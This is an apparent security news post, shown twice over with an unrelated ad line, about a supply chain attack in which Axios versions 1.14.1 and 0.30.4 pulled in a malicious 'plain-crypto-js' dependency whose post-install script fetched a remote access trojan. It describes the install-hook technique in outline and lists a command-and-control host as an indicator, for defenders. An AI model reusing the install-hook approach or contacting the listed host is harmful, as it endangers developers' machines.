Axios Hit by Critical Supply Chain Attack: Malware Injected into 100M-Download LibraryAxios, one of the world's most popular HTTP clients with over 100 million weekly downloads, has fallen victim to a sophisticated supply chain attack. Threat actors successfully injected a Remote Access Trojan (RAT) into versions 1.14.1 and 0.30.4. The malicious code remained active for approximately two and a half hours before being detected and removed.
The Mechanism of Attack: Dependency Poisoning
The attackers utilized a "Dependency Poisoning" technique. They first published a malicious package named plain-crypto-js and subsequently modified the Axios source code to include this package as a dependency.
While Axios typically uses GitHub Actions for automated builds and publishing, these compromised versions were uploaded directly from a manual account associated with the email ifstap@proton.me.
How the Malware Operates
The primary Axios code did not contain the malware directly to avoid initial detection. Instead, a malicious post-install script was triggered during the npm install process. This script fetched the RAT from an external server and installed it on the developer’s machine, giving the attackers full remote control over the infected system.
Network Indicators for Organizations:
Malicious C2 Server: sfrclak.com:8000
Recommendation: Security teams should immediately audit network logs for any outbound traffic to this domain and ensure all Axios versions are downgraded or updated to a verified safe release.
Although the malware's spread time is only 2.5 hours, the 100 million downloads per week mean that every minute, tens of thousands of projects worldwide could automatically download this malicious version via their CI/CD pipelines. This is why Supply Chain Attacks are among the most dangerous.
Global libraries typically use OIDC (OpenID Connect) to verify that updates only come from GitHub Actions. The fact that a personal email account (ProtonMail) can push new versions highlights a vulnerability in project access control. Developers should always check package proofs before using them.
Experts recommend strictly using pinned versions along with Subresource Integrity (SRI) or Dependency Lockfiles (such as package-lock.json or yarn.lock) to prevent the system from downloading problematic new versions without human verification.
Tools like Socket.dev or Snyk are recommended, as they immediately alert if a package's maintainer changes or suspicious dependencies are added in new versions.
LeBron and Ronaldo The World Biggest Stars are Betting on WHOOP $10B Future.
Source: StepSecurity
Axios Hit by Critical Supply Chain Attack: Malware Injected into 100M-Download LibraryAxios, one of the world's most popular HTTP clients with over 100 million weekly downloads, has fallen victim to a sophisticated supply chain attack. Threat actors successfully injected a Remote Access Trojan (RAT) into versions 1.14.1 and 0.30.4. The malicious code remained active for approximately two and a half hours before being detected and removed.
The Mechanism of Attack: Dependency Poisoning
The attackers utilized a "Dependency Poisoning" technique. They first published a malicious package named plain-crypto-js and subsequently modified the Axios source code to include this package as a dependency.
While Axios typically uses GitHub Actions for automated builds and publishing, these compromised versions were uploaded directly from a manual account associated with the email ifstap@proton.me.
How the Malware Operates
The primary Axios code did not contain the malware directly to avoid initial detection. Instead, a malicious post-install script was triggered during the npm install process. This script fetched the RAT from an external server and installed it on the developer’s machine, giving the attackers full remote control over the infected system.
Network Indicators for Organizations:
Malicious C2 Server: sfrclak.com:8000
Recommendation: Security teams should immediately audit network logs for any outbound traffic to this domain and ensure all Axios versions are downgraded or updated to a verified safe release.
Although the malware's spread time is only 2.5 hours, the 100 million downloads per week mean that every minute, tens of thousands of projects worldwide could automatically download this malicious version via their CI/CD pipelines. This is why Supply Chain Attacks are among the most dangerous.
Global libraries typically use OIDC (OpenID Connect) to verify that updates only come from GitHub Actions. The fact that a personal email account (ProtonMail) can push new versions highlights a vulnerability in project access control. Developers should always check package proofs before using them.
Experts recommend strictly using pinned versions along with Subresource Integrity (SRI) or Dependency Lockfiles (such as package-lock.json or yarn.lock) to prevent the system from downloading problematic new versions without human verification.
Tools like Socket.dev or Snyk are recommended, as they immediately alert if a package's maintainer changes or suspicious dependencies are added in new versions.
LeBron and Ronaldo The World Biggest Stars are Betting on WHOOP $10B Future.
Source: StepSecurity
Comments
Post a Comment